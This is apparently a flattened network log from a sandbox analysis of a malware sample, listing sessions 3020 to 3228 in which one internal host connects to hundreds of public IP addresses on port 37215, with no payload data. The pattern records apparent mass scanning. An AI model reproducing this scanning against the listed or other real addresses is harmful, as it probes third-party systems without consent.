                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3020192.168.2.1538840197.142.95.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3021192.168.2.1547520157.11.59.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3022192.168.2.155593470.162.42.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3023192.168.2.154406458.254.1.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3024192.168.2.1559280157.212.55.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3025192.168.2.1537792197.181.150.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3026192.168.2.1547416200.207.30.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3027192.168.2.153308441.139.197.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3028192.168.2.1539708157.28.106.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3029192.168.2.1538166197.3.219.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3030192.168.2.1537902157.125.248.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3031192.168.2.154597441.223.55.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3032192.168.2.1555676157.116.31.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3033192.168.2.1535944128.168.170.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3034192.168.2.153563841.119.198.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3035192.168.2.155187241.76.35.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3036192.168.2.1533112197.152.126.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3037192.168.2.1543400157.126.163.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3038192.168.2.1542652157.102.210.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3039192.168.2.1540366157.132.15.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3040192.168.2.1559518170.206.199.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3041192.168.2.153770641.127.128.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3042192.168.2.155249241.190.66.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3043192.168.2.155039241.53.27.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3044192.168.2.1533698157.251.185.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3045192.168.2.1553298197.147.5.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3046192.168.2.1545908219.198.20.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3047192.168.2.156043441.231.110.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3048192.168.2.1560442157.205.79.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3049192.168.2.155657441.52.17.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3050192.168.2.154386441.119.169.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3051192.168.2.1560762134.196.37.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3052192.168.2.155455241.38.197.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3053192.168.2.1544094157.112.14.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3054192.168.2.1559052157.207.24.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3055192.168.2.1548056197.196.6.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3056192.168.2.155536870.191.206.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3057192.168.2.1547320197.40.205.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3058192.168.2.1548676157.253.43.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3059192.168.2.155041441.40.5.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3060192.168.2.154092041.12.11.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3061192.168.2.155522024.117.3.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3062192.168.2.1560884157.223.86.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3063192.168.2.155230641.235.195.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3064192.168.2.1533194157.168.244.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3065192.168.2.1542766157.214.230.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3066192.168.2.1538340157.230.206.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3067192.168.2.154356841.105.86.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3068192.168.2.1549986169.52.55.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3069192.168.2.1554466179.69.46.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3070192.168.2.1539408197.116.50.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3071192.168.2.155397041.137.98.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3072192.168.2.153708241.51.239.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3073192.168.2.1552250157.55.150.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3074192.168.2.1556704157.158.227.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3075192.168.2.1557714197.151.115.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3076192.168.2.155938041.185.174.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3077192.168.2.1551990157.56.237.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3078192.168.2.154083641.99.118.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3079192.168.2.1548004157.181.81.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3080192.168.2.1543880144.49.95.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3081192.168.2.1550974197.110.115.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3082192.168.2.1547272157.210.185.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3083192.168.2.154920641.172.200.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3084192.168.2.1545992157.14.94.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3085192.168.2.1549474157.219.163.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3086192.168.2.1535512157.134.91.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3087192.168.2.1542188120.202.250.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3088192.168.2.1560556157.85.135.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3089192.168.2.1543660157.248.59.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3090192.168.2.154952041.31.70.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3091192.168.2.1554474197.63.117.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3092192.168.2.15346725.187.164.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3093192.168.2.153823841.230.109.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3094192.168.2.1559178177.175.225.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3095192.168.2.1538636103.103.245.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3096192.168.2.1555588197.224.174.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3097192.168.2.1546538197.175.251.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3098192.168.2.1541292148.89.15.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3099192.168.2.155301041.227.165.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3100192.168.2.1550718132.80.157.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3101192.168.2.1540998197.23.79.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3102192.168.2.1534252126.37.53.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3103192.168.2.155673090.52.34.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3104192.168.2.1533260157.183.116.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3105192.168.2.154033444.76.201.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3106192.168.2.1537068197.229.99.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3107192.168.2.1547604197.182.148.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3108192.168.2.153726441.139.27.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3109192.168.2.1533224197.8.8.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3110192.168.2.154402250.60.127.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3111192.168.2.1549504107.123.79.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3112192.168.2.1532798197.89.10.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3113192.168.2.153470641.191.208.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3114192.168.2.154587466.156.162.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3115192.168.2.153603241.97.138.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3116192.168.2.1544618157.146.48.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3117192.168.2.1542144136.124.51.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3118192.168.2.155117641.39.186.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3119192.168.2.1560046157.119.165.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3120192.168.2.1535128197.225.150.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3121192.168.2.1535078197.8.169.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3122192.168.2.154431641.75.139.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3123192.168.2.1544442157.184.189.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3124192.168.2.1553046197.212.165.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3125192.168.2.1541458157.173.57.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3126192.168.2.1550236197.127.53.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3127192.168.2.156010041.126.147.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3128192.168.2.153380019.164.40.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3129192.168.2.153738041.247.49.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3130192.168.2.155096012.228.36.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3131192.168.2.1543818197.19.127.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3132192.168.2.1535472197.6.111.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3133192.168.2.156082441.135.99.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3134192.168.2.154992476.142.66.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3135192.168.2.155029641.64.148.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3136192.168.2.1552068197.191.17.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3137192.168.2.153417041.60.60.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3138192.168.2.1539934197.247.118.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3139192.168.2.1546890157.65.231.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3140192.168.2.1543162157.122.172.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3141192.168.2.1559322197.70.195.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3142192.168.2.155888284.92.136.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3143192.168.2.155549241.228.167.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3144192.168.2.1549982197.84.63.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3145192.168.2.1533016157.63.41.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3146192.168.2.156012841.137.118.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3147192.168.2.1541630197.237.171.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3148192.168.2.153661841.53.44.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3149192.168.2.1547916197.58.201.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3150192.168.2.1534212218.116.59.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3151192.168.2.1541760197.235.11.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3152192.168.2.1550054157.95.41.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3153192.168.2.154625850.170.96.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3154192.168.2.153519641.142.86.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3155192.168.2.1540774119.12.40.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3156192.168.2.153986851.199.53.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3157192.168.2.155057241.210.65.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3158192.168.2.153304673.160.114.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3159192.168.2.1540126157.206.54.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3160192.168.2.1555816146.66.70.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3161192.168.2.154857041.99.24.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3162192.168.2.1544882223.59.69.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3163192.168.2.1545386197.188.107.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3164192.168.2.1554128149.6.21.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3165192.168.2.1537240197.103.206.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3166192.168.2.1548652211.45.196.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3167192.168.2.153456641.179.116.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3168192.168.2.1555150197.148.149.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3169192.168.2.1538370197.162.17.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3170192.168.2.1557262157.153.56.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3171192.168.2.1555330197.188.251.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3172192.168.2.1547618197.164.33.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3173192.168.2.1540002197.159.180.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3174192.168.2.1536366197.5.219.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3175192.168.2.1543218157.166.242.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3176192.168.2.1535022157.201.38.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3177192.168.2.1547440197.46.76.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3178192.168.2.1539902157.75.78.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3179192.168.2.153464441.138.149.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3180192.168.2.153788641.17.35.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3181192.168.2.154759241.116.81.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3182192.168.2.154276041.65.113.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3183192.168.2.1545520197.181.88.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3184192.168.2.155263469.240.169.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3185192.168.2.154484441.87.244.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3186192.168.2.1538574197.176.61.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3187192.168.2.1535096110.157.205.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3188192.168.2.1536264192.232.152.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3189192.168.2.1549430197.62.58.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3190192.168.2.1540594157.83.240.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3191192.168.2.154113241.232.19.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192192.168.2.153461293.55.237.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3193192.168.2.154299641.58.234.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3194192.168.2.1560064223.198.209.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3195192.168.2.153385012.78.168.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3196192.168.2.1535488157.122.195.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3197192.168.2.1555100170.100.181.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3198192.168.2.1554884167.101.55.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3199192.168.2.155274441.93.140.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3200192.168.2.1541518197.207.144.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3201192.168.2.1554356197.130.74.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3202192.168.2.1557614197.128.198.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3203192.168.2.1547884197.182.81.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3204192.168.2.154095241.91.39.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3205192.168.2.1532902152.4.200.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3206192.168.2.1538636197.39.90.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3207192.168.2.154550041.5.174.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3208192.168.2.1544090197.244.27.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3209192.168.2.154964078.60.224.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3210192.168.2.154027441.178.88.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3211192.168.2.1545422197.65.209.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3212192.168.2.1542924157.158.105.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3213192.168.2.1560702197.103.176.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3214192.168.2.153747641.142.231.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3215192.168.2.1535204170.65.205.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3216192.168.2.154308641.114.116.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3217192.168.2.154680441.122.252.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3218192.168.2.1554332157.14.215.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3219192.168.2.154248441.250.14.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3220192.168.2.154206441.19.243.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3221192.168.2.1540182157.178.68.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3222192.168.2.153913441.83.190.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3223192.168.2.154954481.44.165.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3224192.168.2.1541018145.114.31.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3225192.168.2.1558758157.137.46.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3226192.168.2.154623293.136.151.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3227192.168.2.1546514157.135.130.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3228192.168.2.1534582157.37.199.23537215
                                                          TimestampBytes transferredDirectionData


